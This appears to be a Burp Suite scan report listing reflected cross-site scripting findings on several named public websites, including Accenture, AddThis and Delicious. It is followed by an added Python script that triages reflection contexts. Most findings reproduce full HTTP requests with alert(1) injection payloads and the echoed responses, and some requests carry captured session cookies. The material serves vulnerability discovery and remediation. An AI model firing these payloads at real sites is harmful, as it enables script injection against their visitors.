HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:48:44 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:43 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: cache Pragma: no-cache Content-Length: 67195
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title> Search</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content=" ...[SNIP]... 03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*&ie=utf8&oe=utf8&output=xml_no_dtd&search_in=main&site=main_locations522c2"><script>alert(1)</script>af5239f4278&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" > ...[SNIP]...
The value of the windowTitle request parameter is copied into the HTML document as plain text between tags. The payload 931a7<x%20style%3dx%3aexpression(alert(1))>96a5af8d84d44cce5 was submitted in the windowTitle parameter. This input was echoed as 931a7<x style=x:expression(alert(1))>96a5af8d84d44cce5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Date: Sun, 21 Nov 2010 17:15:19 GMT Connection: keep-alive Set-Cookie: Commerce2002_TestSessionCookie=TestCookie; path=/ Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 17:15:19 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Pragma: no-cache Content-Length: 8297
<title>Submit6a17b</title><x style=x:expression(alert(1))>1898685ddda931a7<x style=x:expression(alert(1))>96a5af8d84d44cce5</title> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HT ...[SNIP]...
The value of the windowTitle request parameter is copied into the HTML document as text between TITLE tags. The payload 6a17b</title><x%20style%3dx%3aexpression(alert(1))>1898685ddda was submitted in the windowTitle parameter. This input was echoed as 6a17b</title><x style=x:expression(alert(1))>1898685ddda in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /accenture/registration/PrintThis.aspx?GUID={13DF5E01-389F-4013-BC36-296A775C1FE5}&footerGuid=9E541954-D5F8-4EC6-AF22-9FF473A55D70&authorContext=PresentationPublished&channelguid={4FDF0FFF-C188-490F-AEA1-A93A6B40D85B}&windowTitle=Submit6a17b</title><x%20style%3dx%3aexpression(alert(1))>1898685ddda HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:47:05 GMT Content-Length: 8127 Connection: close Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:47:05 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Pragma: no-cache
<title>Submit6a17b</title><x style=x:expression(alert(1))>1898685ddda</title> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title>PrintThis</title>
The value of the windowTitle request parameter is copied into the HTML document as text between TITLE tags. The payload 71140</title><x%20style%3dx%3aexpression(alert(1))>22cfa4275fecd007f was submitted in the windowTitle parameter. This input was echoed as 71140</title><x style=x:expression(alert(1))>22cfa4275fecd007f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Date: Sun, 21 Nov 2010 17:15:36 GMT Connection: keep-alive Set-Cookie: Commerce2002_TestSessionCookie=TestCookie; path=/ Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 17:15:36 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Pragma: no-cache Content-Length: 8183
<title>71140</title><x style=x:expression(alert(1))>22cfa4275fecd007f</title> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title>PrintThis</title>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51be1"-alert(1)-"86235a760be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php51be1"-alert(1)-"86235a760be HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 21 Nov 2010 17:13:55 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=5jcqmj343pegjkpgcn6sniqk25; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1447 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.php51be1"-alert(1)-"86235a760be"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 32c01<script>alert(1)</script>1eff1198961 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.php32c01<script>alert(1)</script>1eff1198961 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 21 Nov 2010 17:13:56 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=4l75jifc1vmjsl9ceq8smd6no3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1473 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.php32c01<script>alert(1)</script>1eff1198961</strong> ...[SNIP]...
1.142. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ba68"-alert(1)-"56e962f9ff9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/5ba68"-alert(1)-"56e962f9ff9 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 17:13:52 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 88293
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/5ba68"-alert(1)-"56e962f9ff9"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
1.143. http://www.dailyrotation.com/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyrotation.com
Path: /index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7d53'><script>alert(1)</script>ea2cc056bdc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php/a7d53'><script>alert(1)</script>ea2cc056bdc HTTP/1.1
Host: www.dailyrotation.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 18:11:57 GMT
Server: Apache/2.0.51 (Fedora)
X-Powered-By: PHP/4.3.10
Set-Cookie: PHPSESSID=8fe5413863d004cd4dffc69e9523aac6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 208601
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD>
1.144. http://www.dailyrotation.com/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyrotation.com
Path: /index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5acc8"><script>alert(1)</script>328385cd11c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php/5acc8"><script>alert(1)</script>328385cd11c HTTP/1.1
Host: www.dailyrotation.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 18:11:53 GMT
Server: Apache/2.0.51 (Fedora)
X-Powered-By: PHP/4.3.10
Set-Cookie: PHPSESSID=c8c0a760cd8f98cd3b42b976fc403223; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 212394
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3e8b"><script>alert(1)</script>3501892d15d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that the response also carries X-Xss-Protection: 0, which disables the reflected-XSS filter in browsers that honour that header, so the injected script runs without any filter bypass being required.
Request
GET /poste3e8b"><script>alert(1)</script>3501892d15d HTTP/1.1
Host: www.delicious.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 17:57:35 GMT
Set-Cookie: BX=bk4eee96eincf&b=3&s=p9; expires=Tue, 21-Nov-2012 20:00:00 GMT; path=/; domain=.delicious.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: searchTray=deleted; expires=Sat, 21-Nov-2009 17:57:34 GMT; path=/; domain=.delicious.com
Pragma: no-cache
Cache-Control: no-store, must-revalidate, no-cache, private, max-age=0, post-check=0, pre-check=0
X-Xss-Protection: 0
Expires: Sun, 1 Jan 2006 01:00:00 GMT
X-Ua-Compatible: IE=7
Set-Cookie: delicious_us_production=aOBwa0.OcQ6pvK8qi9rZPTho35F3kIgcrHKdNprAMBBeH0VAWeQUPcYK5diyA_KPmnbHcmDB7qOeHc.Y1SF_.JjJp3zW5idQnvtldXV5sLdQCx8VnSgf1vH12i8Il3UjL17Mnbx3uUKpBlJQUkWXoS.sPQWto5Rkd61EA50IQniwMKL7iRakgzOAS8TpWfy2QEjhf3gNQq0Y199oHJMHFSnHGHDGYsZupZ.D.tshfMRVzxsd.xDL_9RxZp.CbZ_jt9LHs0Z8bFlSqjXnVzKnTH1uGBgBRw1O6Fdti2MQqAsVOLsF0h_kxrpSOG_AaqnSSjAPe38pjVo-; expires=Mon, 21-Nov-2011 17:57:35 GMT; path=/; domain=.delicious.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 0
Connection: close
Server: YTS/1.17.21
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta h ...[SNIP]... <a href="/poste3e8b"><script>alert(1)</script>3501892d15d?settagview=cloud"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe581"><script>alert(1)</script>c005148dcf7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /robots.txtfe581"><script>alert(1)</script>c005148dcf7 HTTP/1.1
Host: www.delicious.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 17:57:32 GMT
Set-Cookie: BX=e7fd4k16eincc&b=3&s=o5; expires=Tue, 21-Nov-2012 20:00:00 GMT; path=/; domain=.delicious.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: searchTray=deleted; expires=Sat, 21-Nov-2009 17:57:31 GMT; path=/; domain=.delicious.com
Pragma: no-cache
Cache-Control: no-store, must-revalidate, no-cache, private, max-age=0, post-check=0, pre-check=0
X-Xss-Protection: 0
Expires: Sun, 1 Jan 2006 01:00:00 GMT
X-Ua-Compatible: IE=7
Set-Cookie: delicious_us_production=ckLtZtuNcQ42hIKZOkVaFKp1JLyzleBmiYSELxBCLupLYTAmo._oO8G9g2QNgTa7Nq8.YwWIKx9zQzypWUrdoMHsBt0YAkTsLhd67VFA93GJkBxj1Jtyb0iZSqWUABH1gRu6FXSTdIcBRVWJPj.E8WbkZPnKl0_S3.1lg1VxI9xpje0Gm4ce912BwZmgo3zQmkCG.SaOQv5_A3xNAWK42K38CN_5CfI0FhWlI2bp1wN.mO8DjVwhqQf90d_CHS5Yvfol9oB_f6ZEYCdxrjdbFil1Gz5E3mZn7LmhiRoL43vjABOUMY0Rc3ZNvdGrErptGcanCtfjnuM-; expires=Mon, 21-Nov-2011 17:57:32 GMT; path=/; domain=.delicious.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 0
Connection: close
Server: YTS/1.17.21
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta h ...[SNIP]... <a href="/robots.txtfe581"><script>alert(1)</script>c005148dcf7?settagview=cloud"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cef6"><a>d1a9d545bb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beer_finder7cef6"><a>d1a9d545bb1/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
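The scanner text for the findings in this section reduces to two questions that an analyst answers by hand when the tool stops short, as it does for the ninkasibrewing.com entries (tag injection confirmed, no JavaScript proof of concept): in which syntactic context does the probe land (JavaScript string in 1.142, a double- or single-quoted attribute in 1.143, 1.144 and the delicious.com entries), and which metacharacters came back unmodified? The following is an added Python example of that triage (editor-supplied, not part of the report or of Burp Suite). It runs over constructed responses modelled on the report's snippets; the HTML-encoded variant and the single-quoted reflection point are hypothetical inputs included to exercise the "delimiter survived but tags blocked" branches, and the context detection deliberately ignores JavaScript comments and regex literals.

```python
import re
from typing import Optional

# Metacharacters whose survival decides what an attacker can do with a reflection.
METACHARS = '"\'<>/'

# Constructed responses (not captured traffic), modelled on the report's snippets.
RESP_JS_STRING = (           # shape of the 1.142 addthis.com response
    '<html><head><script type="text/javascript">\n'
    'var u = "/bookmark.php/5ba68"-alert(1)-"56e962f9ff9";\n'
    'if (typeof utmx != "undefined") { u += "?com=" + utmx("combination"); }\n'
    '</script></head></html>'
)
RESP_ATTR_DQ = (             # shape of the delicious.com response
    '<html><body><a href="/poste3e8b"><script>alert(1)</script>3501892d15d?settagview=cloud">'
    'tags</a></body></html>'
)
RESP_ATTR_ENCODED = (        # hypothetical: the same sink after the server HTML-encodes the path
    '<html><body><a href="/poste3e8b&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;3501892d15d'
    '?settagview=cloud">tags</a></body></html>'
)
RESP_ATTR_SQ = (             # single-quoted attribute as in 1.143; the reflection point is constructed
    "<html><body><form action='/index.php'>"
    "<input type='text' name='q' value='a7d53'><script>alert(1)</script>ea2cc056bdc'>"
    "</form></body></html>"
)


def _js_quote_state(src: str) -> Optional[str]:
    """Quote character of the JS string literal still open at the end of `src`, or None.
    Backslash escapes are honoured; comments and regex literals are not modelled."""
    quote, i = None, 0
    while i < len(src):
        c = src[i]
        if quote:
            if c == "\\":
                i += 1                      # skip the escaped character
            elif c == quote:
                quote = None
        elif c in "\"'`":
            quote = c
        i += 1
    return quote


def _attr_quote_state(tag_prefix: str) -> Optional[str]:
    """Same idea inside an HTML start tag: which quoted attribute value is still open?"""
    quote = None
    for c in tag_prefix:
        if quote:
            if c == quote:
                quote = None
        elif c in "\"'":
            quote = c
    return quote


def classify_context(before: str) -> dict:
    """Classify the position immediately after `before` (the response text preceding the probe)."""
    low = before.lower()
    s_open, s_close = low.rfind("<script"), low.rfind("</script")
    if s_open != -1 and s_open > s_close:
        gt = before.find(">", s_open)
        if gt != -1:                        # probe is inside the script body
            q = _js_quote_state(before[gt + 1:])
            return {"context": "js_string" if q else "js_code", "quote": q}
    t_open, t_close = before.rfind("<"), before.rfind(">")
    if t_open != -1 and t_open > t_close:   # probe is inside a start tag
        q = _attr_quote_state(before[t_open:])
        return {"context": "html_attribute" if q else "html_tag", "quote": q}
    return {"context": "html_text", "quote": None}


def verdict(ctx: dict, survived: list) -> str:
    """What the surviving metacharacters allow in this context."""
    c, q = ctx["context"], ctx["quote"]
    if c == "js_string":
        if q in survived:
            return "JS string can be terminated: arbitrary JavaScript"
        if all(ch in survived for ch in "</>"):
            return "delimiter encoded but </script> survives: script block can be closed, arbitrary JavaScript"
        return "inside JS string with delimiter encoded: no break-out via this sink"
    if c == "html_attribute":
        if q in survived and "<" in survived and ">" in survived:
            return "attribute and tag can be closed: new HTML tags injectable"
        if q in survived:
            return "attribute can be closed: new attributes (event handlers) injectable, no new tags"
        return "attribute value intact: no break-out via this sink"
    if c == "html_text":
        if "<" in survived and ">" in survived:
            return "new HTML tags injectable"
        return "text context with angle brackets encoded"
    return "%s context: review manually" % c


def reflection_report(body: str, prefix: str, middle: str, suffix: str) -> dict:
    """Locate a Burp-style probe (random prefix, metacharacters, random suffix) in `body` and
    report the reflection context plus which of the sent metacharacters came back unmodified."""
    m = re.search(re.escape(prefix) + "(.*?)" + re.escape(suffix), body, re.S)
    if not m:
        return {"reflected": False}
    echoed = m.group(1)
    survived = [c for c in METACHARS if c in middle and c in echoed]
    ctx = classify_context(body[:m.start()])
    report = {"reflected": True, "echoed": echoed, "survived": survived, **ctx}
    report["verdict"] = verdict(ctx, survived)
    return report


if __name__ == "__main__":
    cases = [
        (RESP_JS_STRING, "5ba68", '"-alert(1)-"', "56e962f9ff9"),
        (RESP_ATTR_DQ, "e3e8b", '"><script>alert(1)</script>', "3501892d15d"),
        (RESP_ATTR_ENCODED, "e3e8b", '"><script>alert(1)</script>', "3501892d15d"),
        (RESP_ATTR_SQ, "a7d53", "'><script>alert(1)</script>", "ea2cc056bdc"),
    ]
    for body, pre, mid, suf in cases:
        print(reflection_report(body, pre, mid, suf))
```

For a live target the body would come from the response to the request shown in each finding; the prefix and suffix are the random tokens the scanner wraps around the metacharacters precisely so that `reflection_report` can find the echo even when the server has encoded or stripped the middle.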
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19329"><a>8b6dab35f14 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beer_finder19329"><a>8b6dab35f14/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b114"><a>2a2a038a928 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beer_finder6b114"><a>2a2a038a928/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 536f7"><a>2e8ea686748 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beer_finder536f7"><a>2e8ea686748/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4b6f"><a>5c83f0838cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beer_finderf4b6f"><a>5c83f0838cb/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:47 GMT
Server: Apache
